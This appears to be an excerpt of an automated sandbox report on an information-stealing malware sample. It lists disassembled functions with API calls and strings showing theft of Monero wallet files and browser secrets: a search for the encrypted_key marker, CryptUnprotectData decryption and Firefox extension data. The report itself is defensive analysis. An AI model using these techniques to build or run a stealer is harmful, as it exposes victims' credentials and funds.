                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: 03d57d401bb14edc8826c6be92c1af0fbefb2a3677f8a35e36460eca3d697e9b
                                  • Instruction ID: 791173a01ab55b14b53da82ad65214fb768601d284136862c85af6044c4584ee
                                  • Opcode Fuzzy Hash: 03d57d401bb14edc8826c6be92c1af0fbefb2a3677f8a35e36460eca3d697e9b
                                  • Instruction Fuzzy Hash: 02E08CB0A48308FFDB00DB95DD0AE6D77B8EB04301F000094FD4DA7360DA719E408B91
                                  Function 00BAA990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BB8CF0: GetSystemTime.KERNEL32(00BC0E1B,0130AA18,00BC05B6,?,?,00BA13F9,?,0000001A,00BC0E1B,00000000,?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BB8D16
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BAAA11
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 00BAAB2F
                                  • lstrlen.KERNEL32(00000000), ref: 00BAADEC
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BAAE73
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 023849642c00ed5b6310ec92bb85073a32c2351ad9b2182bf49876a067c4209c
                                  • Instruction ID: 29c2c71adc69304610f6f65ad39300527fa4f82d833d54fb527538bdb514cba0
                                  • Opcode Fuzzy Hash: 023849642c00ed5b6310ec92bb85073a32c2351ad9b2182bf49876a067c4209c
                                  • Instruction Fuzzy Hash: 20E1AD72D10118ABCB14EBA4DDA2EFE77B9AF54300F5085D9F11672091EEB06A4CCB72
                                  Function 00BAD500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BB8CF0: GetSystemTime.KERNEL32(00BC0E1B,0130AA18,00BC05B6,?,?,00BA13F9,?,0000001A,00BC0E1B,00000000,?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BB8D16
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BAD581
                                  • lstrlen.KERNEL32(00000000), ref: 00BAD798
                                  • lstrlen.KERNEL32(00000000), ref: 00BAD7AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BAD82B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: fff0078392460f85d40b9233fe93c3ef1c767ebbb716611160ce8a17026a62ff
                                  • Instruction ID: 0f413d03164c6c8e968418ad0f944f7662534a10b4d3a38b5dbfe9e775b504a3
                                  • Opcode Fuzzy Hash: fff0078392460f85d40b9233fe93c3ef1c767ebbb716611160ce8a17026a62ff
                                  • Instruction Fuzzy Hash: 1A91AC72D10108ABCF14EBA4DDA2EFE77B9AF54300F5045E9F51676091EEB06A48CB62
                                  Function 00BAD880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BB8CF0: GetSystemTime.KERNEL32(00BC0E1B,0130AA18,00BC05B6,?,?,00BA13F9,?,0000001A,00BC0E1B,00000000,?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BB8D16
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BAD901
                                  • lstrlen.KERNEL32(00000000), ref: 00BADA9F
                                  • lstrlen.KERNEL32(00000000), ref: 00BADAB3
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BADB32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 7fe4fdd7982a85d0f8b0adcd30c40ad265bba8eaa0d5b2e5be8bfb1e6b836431
                                  • Instruction ID: 0a29ee68ed8691bd9fd241ced6fd2297b2e30409673782b1d0369f6d5890dbb5
                                  • Opcode Fuzzy Hash: 7fe4fdd7982a85d0f8b0adcd30c40ad265bba8eaa0d5b2e5be8bfb1e6b836431
                                  • Instruction Fuzzy Hash: EA81B272D20104ABCF14FBA4DDA6EFE77B9AF54300F4045A9F51676091EFB06A48CB62
                                  Function 00C1FED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                  • Instruction ID: 53f63e191a34e8e5b0ddff0b90928522abfa4f95e5a25e2e0179ef027a6036d4
                                  • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                  • Instruction Fuzzy Hash: 6451D472500215AFFB259F95D841BFA77A5FF02310F24412EE81647992EB71EE82F790
                                  Function 00BAA560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00BAA664
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: @$v10$v20
                                  • API String ID: 2746078483-278772428
                                  • Opcode ID: b6333b80979b78b952dbe7bc43782e2ed99b1f65e294300d496e252c461603ea
                                  • Instruction ID: 71c50bfbab53f8ab33cf255c7595988567d9388a2976ed1713d9b8b64dd535c2
                                  • Opcode Fuzzy Hash: b6333b80979b78b952dbe7bc43782e2ed99b1f65e294300d496e252c461603ea
                                  • Instruction Fuzzy Hash: B5515A70A14208EFDB24EFA4CD96FED77F5AF55304F408058F90A6B291EBB06A05CB61
                                  Function 00BAF5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BBAAF6
                                    • Part of subcall function 00BAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BAA13C
                                    • Part of subcall function 00BAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BAA161
                                    • Part of subcall function 00BAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BAA181
                                    • Part of subcall function 00BAA110: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BAA1AA
                                    • Part of subcall function 00BAA110: LocalFree.KERNEL32(00BA148F), ref: 00BAA1E0
                                    • Part of subcall function 00BAA110: CloseHandle.KERNEL32(000000FF), ref: 00BAA1EA
                                    • Part of subcall function 00BB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8FE2
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00BC1678,00BC0D93), ref: 00BAF64C
                                  • lstrlen.KERNEL32(00000000), ref: 00BAF66B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: eb72060b3a5a0f833c907b9e3dd9b18a099ba2eeea7c4bdd470ee97284a76e0e
                                  • Instruction ID: c735a3284fa7131aba21dcc2bbf9635176a0a78df8e7522e15a4704ddb6c2106
                                  • Opcode Fuzzy Hash: eb72060b3a5a0f833c907b9e3dd9b18a099ba2eeea7c4bdd470ee97284a76e0e
                                  • Instruction Fuzzy Hash: C851EF72D10108ABCF14FBE4DDA6EFD77B9AF54300F4085A8F41667191EE746A08CB62
                                  Function 00BB37B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: dca86fb697612bf8fe253d4d6af25a6afc763b8256ba5f3c02346306027c04d8
                                  • Instruction ID: 43dbc6289eca4e8fef46d6e05f354d3ad03b3ccb0e1b4acc36facd7a0d207b4b
                                  • Opcode Fuzzy Hash: dca86fb697612bf8fe253d4d6af25a6afc763b8256ba5f3c02346306027c04d8
                                  • Instruction Fuzzy Hash: EC411B75D10109ABCB04EFA4D895AFEB7F8AF44704F008498F51676291EBB0AA44CFA2
                                  Function 00BAA430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BAA13C
                                    • Part of subcall function 00BAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BAA161
                                    • Part of subcall function 00BAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BAA181
                                    • Part of subcall function 00BAA110: ReadFile.KERNEL32(000000FF,?,00000000,00BA148F,00000000), ref: 00BAA1AA
                                    • Part of subcall function 00BAA110: LocalFree.KERNEL32(00BA148F), ref: 00BAA1E0
                                    • Part of subcall function 00BAA110: CloseHandle.KERNEL32(000000FF), ref: 00BAA1EA
                                    • Part of subcall function 00BB8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BB8FE2
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BAA489
                                    • Part of subcall function 00BAA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4F3E,00000000,00000000), ref: 00BAA23F
                                    • Part of subcall function 00BAA210: LocalAlloc.KERNEL32(00000040,?,?,?,00BA4F3E,00000000,?), ref: 00BAA251
                                    • Part of subcall function 00BAA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BA4F3E,00000000,00000000), ref: 00BAA27A
                                    • Part of subcall function 00BAA210: LocalFree.KERNEL32(?,?,?,?,00BA4F3E,00000000,?), ref: 00BAA28F
                                    • Part of subcall function 00BAA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BAA2D4
                                    • Part of subcall function 00BAA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00BAA2F3
                                    • Part of subcall function 00BAA2B0: LocalFree.KERNEL32(?), ref: 00BAA323
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
